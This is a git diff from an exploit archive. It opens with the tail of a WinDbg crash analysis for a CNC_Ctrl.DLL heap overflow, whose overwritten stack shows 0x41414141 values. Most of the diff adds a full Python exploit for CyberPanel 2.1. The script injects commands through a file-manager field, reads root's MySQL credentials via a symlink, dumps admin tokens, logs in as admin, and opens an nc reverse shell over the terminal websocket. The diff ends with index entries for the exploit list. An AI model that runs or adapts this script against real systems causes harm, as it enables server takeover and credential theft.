41414141 0x41414141 +00afe4c4 41414141 41414141 41414141 41414141 0x41414141 +00afe4c8 41414141 41414141 41414141 41414141 0x41414141 +00afe4cc 41414141 41414141 41414141 41414141 0x41414141 +00afe4d0 41414141 41414141 41414141 41414141 0x41414141 +00afe4d4 41414141 41414141 41414141 41414141 0x41414141 +00afe4d8 41414141 41414141 41414141 41414141 0x41414141 +00afe4dc 41414141 41414141 41414141 41414141 0x41414141 +00afe4e0 41414141 41414141 41414141 41414141 0x41414141 +00afe4e4 41414141 41414141 41414141 41414141 0x41414141 +00afe4e8 41414141 41414141 41414141 41414141 0x41414141 +00afe4ec 41414141 41414141 41414141 41414141 0x41414141 +00afe4f0 41414141 41414141 41414141 41414141 0x41414141 +00afe4f4 41414141 41414141 41414141 41414141 0x41414141 +00afe4f8 41414141 41414141 41414141 41414141 0x41414141 +00afe4fc 41414141 41414141 41414141 41414141 0x41414141 +00afe500 41414141 41414141 41414141 41414141 0x41414141 +00afe504 41414141 41414141 41414141 41414141 0x41414141 +00afe508 41414141 41414141 41414141 41414141 0x41414141 +00afe50c 41414141 41414141 41414141 41414141 0x41414141 +00afe510 41414141 41414141 41414141 41414141 0x41414141 +00afe514 41414141 41414141 41414141 41414141 0x41414141 +00afe518 41414141 41414141 41414141 41414141 0x41414141 +00afe51c 41414141 41414141 41414141 41414141 0x41414141 +00afe520 41414141 41414141 41414141 41414141 0x41414141 +00afe524 41414141 41414141 41414141 41414141 0x41414141 +00afe528 41414141 41414141 41414141 41414141 0x41414141 +00afe52c 41414141 41414141 41414141 41414141 0x41414141 +00afe530 41414141 41414141 41414141 41414141 0x41414141 +00afe534 41414141 41414141 41414141 41414141 0x41414141 +00afe538 41414141 41414141 41414141 41414141 0x41414141 +00afe53c 41414141 41414141 41414141 41414141 0x41414141 +00afe540 41414141 41414141 41414141 41414141 0x41414141 +00afe544 41414141 41414141 41414141 41414141 0x41414141 +00afe548 41414141 41414141 41414141 41414141 0x41414141 +00afe54c 41414141 41414141 41414141 41414141 0x41414141 +00afe550 41414141 41414141 41414141 41414141 0x41414141 +00afe554 41414141 41414141 41414141 41414141 0x41414141 +00afe558 41414141 41414141 41414141 41414141 0x41414141 +00afe55c 41414141 41414141 41414141 41414141 0x41414141 +00afe560 41414141 41414141 41414141 41414141 0x41414141 +00afe564 41414141 41414141 41414141 41414141 0x41414141 +00afe568 41414141 41414141 41414141 41414141 0x41414141 +00afe56c 41414141 41414141 41414141 41414141 0x41414141 +00afe570 41414141 41414141 41414141 41414141 0x41414141 +00afe574 41414141 41414141 41414141 41414141 0x41414141 +00afe578 41414141 41414141 41414141 41414141 0x41414141 +00afe57c 41414141 41414141 41414141 41414141 0x41414141 +00afe580 41414141 41414141 41414141 41414141 0x41414141 +00afe584 41414141 41414141 41414141 41414141 0x41414141 +00afe588 41414141 41414141 41414141 41414141 0x41414141 +00afe58c 41414141 41414141 41414141 41414141 0x41414141 +00afe590 41414141 41414141 41414141 41414141 0x41414141 +00afe594 41414141 41414141 41414141 41414141 0x41414141 +00afe598 41414141 41414141 41414141 41414141 0x41414141 +00afe59c 41414141 41414141 41414141 41414141 0x41414141 +00afe5a0 41414141 41414141 41414141 41414141 0x41414141 +00afe5a4 41414141 41414141 41414141 41414141 0x41414141 +00afe5a8 41414141 41414141 41414141 41414141 0x41414141 +00afe5ac 41414141 41414141 41414141 41414141 0x41414141 +00afe5b0 41414141 41414141 41414141 41414141 0x41414141 +00afe5b4 41414141 41414141 41414141 41414141 0x41414141 +00afe5b8 41414141 41414141 41414141 41414141 0x41414141 +00afe5bc 41414141 41414141 41414141 41414141 0x41414141 +00afe5c0 41414141 41414141 41414141 41414141 0x41414141 +00afe5c4 41414141 41414141 41414141 41414141 0x41414141 +00afe5c8 41414141 41414141 41414141 41414141 0x41414141 +00afe5cc 41414141 41414141 41414141 41414141 0x41414141 +00afe5d0 41414141 41414141 41414141 41414141 0x41414141 +00afe5d4 41414141 41414141 41414141 41414141 0x41414141 +00afe5d8 41414141 41414141 41414141 41414141 0x41414141 +00afe5dc 41414141 41414141 41414141 41414141 0x41414141 +00afe5e0 41414141 41414141 41414141 41414141 0x41414141 +00afe5e4 41414141 41414141 41414141 41414141 0x41414141 +00afe5e8 41414141 41414141 41414141 41414141 0x41414141 +00afe5ec 41414141 41414141 41414141 41414141 0x41414141 +00afe5f0 41414141 41414141 41414141 41414141 0x41414141 +00afe5f4 41414141 41414141 41414141 41414141 0x41414141 + +STACK_COMMAND: ~0s ; .cxr ; kb + +THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2 + +THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1 + +FAULT_INSTR_CODE: 12d49989 + +SYMBOL_STACK_INDEX: 0 + +SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: CNC_Ctrl + +IMAGE_NAME: CNC_Ctrl.DLL + +DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 + +FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer + +BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3 + +FAILURE_EXCEPTION_CODE: c0000005 + +FAILURE_IMAGE_NAME: CNC_Ctrl.DLL + +BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL + +FAILURE_MODULE_NAME: CNC_Ctrl + +BUCKET_ID_MODULE_STR: CNC_Ctrl + +FAILURE_FUNCTION_NAME: DllUnregisterServer + +BUCKET_ID_FUNCTION_STR: DllUnregisterServer + +BUCKET_ID_OFFSET: 18ee3 + +BUCKET_ID_MODTIMEDATESTAMP: 547ed821 + +BUCKET_ID_MODCHECKSUM: 357a4b + +BUCKET_ID_MODVER_STR: 1.7.0.2 + +BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ + +FAILURE_PROBLEM_CLASS: APPLICATION_FAULT + +FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer + +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1 + +TARGET_TIME: 2021-08-12T11:37:22.000Z + +OSBUILD: 19042 + +OSSERVICEPACK: 1023 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt SingleUserTS Personal + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: unknown_date + +BUILDDATESTAMP_STR: 160101.0800 + +BUILDLAB_STR: WinBuild + +BUILDOSVER_STR: 10.0.19041.1023 + +ANALYSIS_SESSION_ELAPSED_TIME: 68b2 + +ANALYSIS_SOURCE: UM + +FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver + +FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} + +Followup: MachineOwner +--------- \ No newline at end of file diff --git a/exploits/multiple/webapps/50230.py b/exploits/multiple/webapps/50230.py new file mode 100755 index 000000000..473531598 --- /dev/null +++ b/exploits/multiple/webapps/50230.py @@ -0,0 +1,203 @@ +# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 27.08.2021 +# Author: Numan Türle +# Vendor Homepage: https://cyberpanel.net/ +# Software Link: https://github.com/usmannasir/cyberpanel +# Version: <=2.1 +# https://www.youtube.com/watch?v=J_8iLELVgkE + + +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +# CyberPanel - Remote Code Execution (Authenticated) +# author: twitter.com/numanturle +# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] +# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password + + +import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from cmd import Cmd + +warnings.simplefilter('ignore',InsecureRequestWarning) + +def init(): + parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution') + parser.add_argument('-u','--host',help='Host', type=str, required=True) + parser.add_argument('-l', '--login',help='Username', type=str, required=True) + parser.add_argument('-p', '--password',help='Password', type=str, required=True) + parser.add_argument('-f', '--file',help='File', type=str) + args = parser.parse_args() + exploit(args) + +def exploit(args): + def on_open(ws): + verifyPath,socket_password + print("[+] Socket connection successful") + print("[+] Trying a reverse connection") + ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}})) + ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password})) + ws.close() + + def on_close(ws, close_status_code, close_msg): + print("[+] Successful") + print("[!] Disconnect from socket") + + + session = requests.Session() + target = "https://{}:8090".format(args.host) + username = args.login + password = args.password + + print("[+] Target {}".format(target)) + + response = session.get(target, verify=False) + session_hand = session.cookies.get_dict() + token = session_hand["csrftoken"] + + print("[+] Token {}".format(token)) + + headers = { + 'X-Csrftoken': token, + 'Cookie': 'csrftoken={}'.format(token), + 'Referer': target + } + + login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"}) + login_json = json.loads(login.content) + + if login_json["loginStatus"]: + session_hand_login = session.cookies.get_dict() + + print("[+] Login Success") + print("[+] Send request fetch websites list") + + headers = { + 'X-Csrftoken': session_hand_login["csrftoken"], + 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]), + 'Referer': target + } + + feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10}) + feth_weblist_json = json.loads(feth_weblist.content) + + if feth_weblist_json["data"]: + + weblist_json = json.loads(feth_weblist_json["data"]) + domain = weblist_json[0]["domain"] + domain_folder = "/home/{}".format(domain) + + print("[+] Successfully {} selected".format(domain)) + print("[+] Creating ssh pub") + + remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1}) + create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)}) + create_ssh_json = json.loads(create_ssh.content) + + if create_ssh_json["status"]: + key = create_ssh_json["deploymentKey"] + + print("[+] Key : {}".format(key)) + + explode_key = key.split() + explode_username = explode_key[-1].split("@") + + if explode_username[0]: + username = explode_username[0] + hostname = explode_username[1] + + print("[+] {} username selected".format(username)) + print("[+] Preparing for symlink attack") + print("[+] Attempting symlink attack with user-level command execution vulnerability #1") + + target_file = args.file + if not target_file: + target_file = "/root/.my.cnf" + domain_folder_ssh = "{}/.ssh".format(domain_folder) + command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username) + completeStartingPath = "{}';{};'".format(domain_folder,command) + + #filemanager/controller - completeStartingPath - command execution vulnerability + + symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain}) + symlink_json = json.loads(symlink.content) + + if symlink_json["status"]: + print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file)) + + read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)}) + read_file_json = json.loads(read_file.content) + read_file = read_file_json["deploymentKey"] + if not args.file: + print("-----------------------------------") + print(read_file.strip()) + print("-----------------------------------") + + mysql_password = re.findall('password=\"(.*?)\"',read_file)[0] + steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder) + + print("[+] Fetching users tokens") + + completeStartingPath = "{}';{}".format(domain_folder,steal_token) + steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain}) + token_file = domain_folder+"/token.txt" + steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain}) + leak = json.loads(steal_token_read_request.content) + leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:] + print("------------------------------") + for user in leak: + b64de = base64.b64decode(user).decode('utf-8') + exp_username = b64de.split(":") + if exp_username[0] == "admin": + admin_password = exp_username[1] + print("[+] " + b64de) + print("------------------------------") + print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~") + print("[+] Try login admin") + + headers = { + 'X-Csrftoken': token, + 'Cookie': 'csrftoken={}'.format(token), + 'Referer': target + } + login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"}) + login_json = json.loads(login_admin.content) + if login_json["loginStatus"]: + session_hand_login = session.cookies.get_dict() + + print("[+] 4dm1n_l061n_5ucc355") + print("[+] c0nn3c71n6_70_73rm1n4l") + headers = { + 'X-Csrftoken': session_hand_login["csrftoken"], + 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]), + 'Referer': target + } + + get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False) + verifyPath = re.findall('id=\"verifyPath\">(.*?)',str(get_websocket_token.content))[-1] + socket_password = re.findall('id=\"password\">(.*?)',str(get_websocket_token.content))[-1] + print("[+] verifyPath {}".format(verifyPath)) + print("[+] socketPassword {}".format(socket_password)) + print("[+] Trying to connect to socket") + ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), + on_open=on_open, + on_close=on_close) + ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE}) + + else: + print("[-] Auto admin login failed") + else: + print(read_file) + else: + print("[-] Unexpected") + else: + print("[-] Username selected failed") + else: + print("[-] Fail ssh pub") + else: + print("[-] List error") + else: + print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"])) + +if __name__ == "__main__": + init() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 077fe38f2..ccd72602f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44354,3 +44354,6 @@ id,file,description,date,author,type,platform,port 50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware, 50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php, 50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple, +50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple, +50231,exploits/hardware/webapps/50231.txt,"COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware, +50232,exploits/hardware/webapps/50232.txt,"COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,